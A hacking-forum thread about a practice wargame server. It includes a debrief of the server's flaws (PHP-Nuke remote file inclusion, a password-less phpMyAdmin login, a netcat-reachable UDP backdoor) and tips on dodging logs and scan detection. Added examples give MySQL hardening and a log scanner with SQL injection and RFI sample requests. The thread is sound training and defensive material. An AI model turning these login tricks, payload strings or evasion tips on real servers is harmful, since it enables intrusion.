Dec. 15: new wargame started!

Questions? Stuck? Post here....
MariaLara
suck-o-fied!
Posts: 99
Joined: 27 Feb 2008, 17:00

Post by MariaLara »

ty :twisted:

Oh, and sorry I SSH'd your host at first.

Don't ask. :lol:
The only true wisdom is in knowing you know nothing.

DNR
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
Location: Michigan USA

Post by DNR »

Whoa! Good job Maria *thumb*

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

I will give info about the flaws and how MariaLara got in tomorrow. If my customers give me a little break, I will see if I can set up a new wargame before the server is taken offline by the provider... :)

maboroshi
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00

Wargames Continuation

Post by maboroshi »

Hey all, was just thinking...

I am wondering if everyone is interested in having a dedicated wargames box here. Was thinking I could keep that server going as my donation to suck-o, and we could get some people to aid in setting up different games.

The server is only like 15 dollars per month, or 10 or something like that.

If people are interested, and we can get some dedicated people familiar with Linux to assist in setting up different games, so bb isn't stuck doing it :-P

And there is enough interest,

I would be more than happy to do this.

Let me know.

AND WELL DONE TO BSD :-)

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

Hm, I think it would be fairer if people donate for a wargame box, and whenever we have enough we rent a server for a month.... I mean, it's much easier for 15 people to donate 1 buck than for you to pay 15 bucks.... :wink: We should discuss this further in an extra thread.

Nerdz
The Architect
Posts: 1127
Joined: 15 Jun 2005, 16:00
Location: #db_error in: select usr.location from sucko_member where usr.id=63;

Post by Nerdz »

Congratulations Maria! :D At least something you succeed in... BECAUSE I FU*KING PWN YOU :)
Give a man a fish, you feed him for one day.
Teach a man to fish, you feed him for life.

Lyecdevf
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
Location: In between life and death.

Post by Lyecdevf »

Nerdz wrote:BECAUSE I FU*KING PWN YOU :)
I do not know what you have between each other, but all I have to say is MariaLara, u are 1337. :D
We will either find a way, or make one.
- Hannibal

ph0bYx
Staff Member
Posts: 2039
Joined: 22 Sep 2008, 16:00

Post by ph0bYx »

Congrats MLara, well done.
Now can you or someone else post a report, please? :)

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

OK, here are the flaws the server had:

- The PHP-Nuke installation was an unpatched old version (7.5); remote file inclusion would have been possible (most likely XSS and SQL injection too). For such issues, checking sites like http://www.securityfocus.com is the key.

- phpMyAdmin was installed in its default place (http://sitename.com/phpmyadmin), but no password was set for MySQL. This flaw is not even rare, because when installing MySQL no password is set by default. MariaLara found this flaw too: she logged in with 1=1-- as username and no password (it would also have been possible to log in as user "root" with no password; this is the default).

- The last flaw was a nasty one. The scenario was: "maybe I am not the first one trying to compromise the server, what if someone was successful already?", so I placed a Perl script in the root directory which opened a backdoor. So it was possible to spawn a shell by connecting to port 520 UDP; the best tool for connecting to such backdoors is netcat.
netcat is originally for Unix/Linux, but a Windows port is also available.
MariaLara found this backdoor and used netcat to connect; she even created a new user, and finally she used it to leave the BSDGurl_was_here message.... All this is clear evidence that she had 100% root permissions and the server was completely under her control.


All of the flaws were realistic, and there are more than enough servers in the wild that could be rooted in those ways.
Without an IDS the backdoor was the stealthiest way, because UDP is a connectionless protocol (no 3-way handshake as with TCP; this was the "server will never welcome you with a handshake" hint, btw), and so no log entries are made in daemon.log or auth.log.
The other 2 flaws would leave entries in the Apache access log, but using a good proxy would make the entries pointless.
If an IDS is running, the backdoor connection would have been noticed, and also the RFI attempts, so the stealthiest way in this case would have been through phpMyAdmin.

So, things to remember are:
- check for known flaws of running services or platforms like PHP-Nuke, WordPress, etc.
- if the server admin is good, port scans are noticed anyway, no matter if you scan 10 ports or all of them.... So IF you run a scan, make sure you will get all possible info with 1 scan; this will most likely be judged as an automated script scan or a one-time skiddie attempt. 10 small scans, by contrast, look much more suspicious.


I am not sure yet if I will have time to set up a new wargame before the server is taken offline by the host at the end of the month; my sister arrived today, so it's family time.... I will keep you up to date and post here instantly then... :wink:

MariaLara
suck-o-fied!
Posts: 99
Joined: 27 Feb 2008, 17:00

Post by MariaLara »

Nerdz wrote:Congratulations Maria! :D At least something you succeed in... BECAUSE I FU*KING PWN YOU :)
LMFAO, I know you did. I was so pissed.
I could give you a list of excuses, but I won't, as I talked so much trash I deserved getting my ass handed to me.
:lol:

Anyways, to everyone in here: Nerdz totally beat my ass in SSBB. Every game. I don't think I even came close to winning one. hahahahahaha
*sigh*

It was great though. Let me practice when I am feeling better, and then we will see.
The only true wisdom is in knowing you know nothing.

maboroshi
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00

Last Time

Post by maboroshi »

Last time I trust a hacker to secure one of my servers, I KILL YOU bb

Joke

:-P :-) :-D

pseudo_opcode
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
Location: 127.0.0.1

Post by pseudo_opcode »

Err, I was late again... I already made a "pwnd by pseudo" page after I found the PHP-Nuke vuln..... but damn job.... I had other work to do. When I resumed, it was already rooted by BSD.

I never thought about phpMyAdmin (silly me, but correct me if I'm wrong, isn't the default authentication method HTTP?). Anyway, I assumed there would be no MySQL pass, so I tried to connect directly to 3306, but since the default config file binds the server to localhost, again I couldn't connect directly to the server... :P

Anyway, I'm sad I missed this one :( but I'm very happy to see the only active lady on suck-o root it. Congrats BSD!

Mab: Man, when you host the next wargame server, please let me know, I'll contribute 50% of the fees; as an admin of suck-o that's the least I could do.
I think we should spice wargames up some more: play in teams (like the older ones) and give points on an hourly basis; the team that wins at the end of the week gets the prize (whatever it is). I already have the old scripts I wrote for hourly point calculation.

AFTER ALL, THIS IS THE SHIT WE LIVE FOR! :twisted:

We can also place some Google ads or something on the servers so that the server itself can pay for the hosting fee. lol, just a thought.

And probably we can add additional holes, so we could enjoy smashing the stack, and yeah, probably some hashed passwords to crack, based on knowledge gained by social engineering (from sources like imaginary site news archives, profile of the current sysadmin)... you know, that is the shit we've got to do in real life...

[ok, back to work]
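The phpMyAdmin flaw in the report comes down to the stock MySQL install: root with an empty password plus anonymous accounts, reachable through phpMyAdmin even when, as pseudo_opcode found, port 3306 itself is bound to localhost, because phpMyAdmin connects from the same host. The following is an added example of checking for and removing those defaults; it is not from the thread or the wargame box. It assumes a MySQL 5.x server of the period: the `Password` column became `authentication_string` in 5.7, and `SET PASSWORD ... = PASSWORD()` was removed in 8.0 in favour of `ALTER USER`. The account and database names and the placeholder passphrases are made up for the demo.

```sql
-- Run as the MySQL root user, e.g.  mysql -u root  (which on the wargame
-- box worked with no password at all).

-- 1. Who can log in with an empty password?  On a fresh 5.x install this
--    returns root@localhost and usually the anonymous ''@localhost account.
SELECT User, Host FROM mysql.user WHERE Password = '';
-- MySQL 5.7+/8.0:  ... WHERE authentication_string = '';

-- 2. Give root a real password (5.x syntax).  On 5.7.6+ and 8.0 use
--    ALTER USER 'root'@'localhost' IDENTIFIED BY '<long random passphrase>';
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('<long random passphrase>');

-- 3. Drop the anonymous account and find any root entry that is allowed to
--    log in from a remote host.  (DROP USER errors if the account does not
--    exist; that is fine, it means there is nothing to remove.)
DROP USER ''@'localhost';
SELECT User, Host FROM mysql.user
 WHERE User = 'root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
-- for each row returned:  DROP USER 'root'@'<that host>';

-- 4. Give the web application its own least-privilege account so neither
--    the CMS nor phpMyAdmin needs to hold the root password at all.
--    Names are assumptions for this example.
CREATE USER 'nuke'@'localhost' IDENTIFIED BY '<another passphrase>';
GRANT SELECT, INSERT, UPDATE, DELETE ON nuke.* TO 'nuke'@'localhost';

-- 5. Confirm nothing is left password-less, then reload the grant tables.
SELECT User, Host FROM mysql.user WHERE Password = '';
FLUSH PRIVILEGES;
```

None of this closes the second half of the flaw, the phpMyAdmin login page sitting at its default path: once root has a password the 1=1-- login no longer works, but the page is still reachable, so it belongs behind HTTP authentication or an address restriction in the web server as well.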

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

Post by Still_Learning »

I could help set up sites to hack on the box.

Not too familiar with Linux though :oops:
Gone

JuggaloMushroom
Fame ! Where are the chicks?!
Posts: 252
Joined: 18 Jul 2006, 16:00

Post by JuggaloMushroom »

bad_brain wrote:OK, here are the flaws the server had:

- The PHP-Nuke installation was an unpatched old version (7.5); remote file inclusion would have been possible (most likely XSS and SQL injection too). For such issues, checking sites like http://www.securityfocus.com is the key.

- phpMyAdmin was installed in its default place (http://sitename.com/phpmyadmin), but no password was set for MySQL. This flaw is not even rare, because when installing MySQL no password is set by default. MariaLara found this flaw too: she logged in with 1=1-- as username and no password (it would also have been possible to log in as user "root" with no password; this is the default).

- The last flaw was a nasty one. The scenario was: "maybe I am not the first one trying to compromise the server, what if someone was successful already?", so I placed a Perl script in the root directory which opened a backdoor. So it was possible to spawn a shell by connecting to port 520 UDP; the best tool for connecting to such backdoors is netcat.
Damn, I came real close. I didn't know that no password was the default though, so I kept putting 1=1'or'1'='1. Hmm... I tried doing some stuff with netcat as well, but I wasn't sure what else I would've done other than connect... too bad I gave up after like 10 attempts.
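bad_brain's point that the PHP-Nuke and phpMyAdmin routes leave tracks in the Apache access log, together with the phpMyAdmin login attempts JuggaloMushroom describes, suggests what a defender would actually look for in that log. This is an added example, not from the thread: it classifies Apache combined-format log lines for remote file inclusion (a URL passed as a parameter value), quote or boolean SQL injection in the query string, and phpMyAdmin requests from an address the admin does not use. The log lines, the `ADMIN_IPS` set and the client addresses are constructed for the demo. One caveat worth knowing: a username like 1=1'or'1'='1 typed into the phpMyAdmin login form travels in a POST body and never reaches the access log; what the log does show is every request to /phpmyadmin/ and the RFI URLs themselves, which is what the script keys on.

```python
"""Scan Apache combined-format access log lines for the two web-side attack
paths from the wargame report: remote file inclusion (a URL passed as a
parameter value) and quote/boolean SQL injection in query strings, plus any
request to phpMyAdmin from an address the admin does not use.

Added example, not from the original thread.  ADMIN_IPS and the log lines
are constructed for the demo."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
RFI_RE = re.compile(r'^(?:https?|ftp)://', re.I)            # the value is itself a URL
SQLI_RE = re.compile(r"'\s*(?:or|and|union|--|#)|\b1=1\b", re.I)  # narrow heuristic
PMA_PREFIXES = ("/phpmyadmin", "/phpMyAdmin", "/pma")
ADMIN_IPS = {"198.51.100.10"}  # assumption: the only address admins browse from


def classify(line):
    """Return tags for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, target = m["ip"], m["target"]
    parts = urlsplit(target)
    tags = []
    # parse_qsl decodes once: attackers URL-encode 'http://' and quotes to
    # dodge naive greps on the raw line.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if RFI_RE.match(value):
            tags.append(f"rfi:{key}")
        elif SQLI_RE.search(value):
            tags.append(f"sqli:{key}")
    if unquote(parts.path).startswith(PMA_PREFIXES) and ip not in ADMIN_IPS:
        tags.append("phpmyadmin-from-unknown-ip")
    return tags


def triage(lines):
    """Group suspicious hits by client address so one noisy source stands out.

    The address is whatever the client (or its proxy, as the report notes)
    presented, so use it to group, not to attribute."""
    hits = defaultdict(list)
    for line in lines:
        tags = classify(line)
        if tags:
            hits[LOG_RE.match(line)["ip"]].extend(tags)
    return dict(hits)


# Constructed sample: one attacker, one admin, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Dec/2008:22:14:03 +0100] "GET /modules.php?name=News&file=http://203.0.113.9/x.txt? HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Dec/2008:22:15:10 +0100] "GET /phpmyadmin/ HTTP/1.1" 200 3321 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Dec/2008:22:15:40 +0100] "POST /phpmyadmin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Dec/2008:22:16:02 +0100] "GET /modules.php?name=Search&query=1%3D1%27or%271%27%3D%271 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.10 - - [15/Dec/2008:22:20:00 +0100] "GET /phpmyadmin/ HTTP/1.1" 200 3321 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [15/Dec/2008:22:21:00 +0100] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, tags in triage(SAMPLE_LOG).items():
        print(ip, tags)
```

As the report says, a proxy makes the address column worthless for attribution, so `triage` groups by it only to surface a noisy source. `SQLI_RE` is deliberately narrow: it runs after one round of URL decoding and will miss double-encoded or comment-obfuscated payloads, so treat a hit as a reason to look, not as proof.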
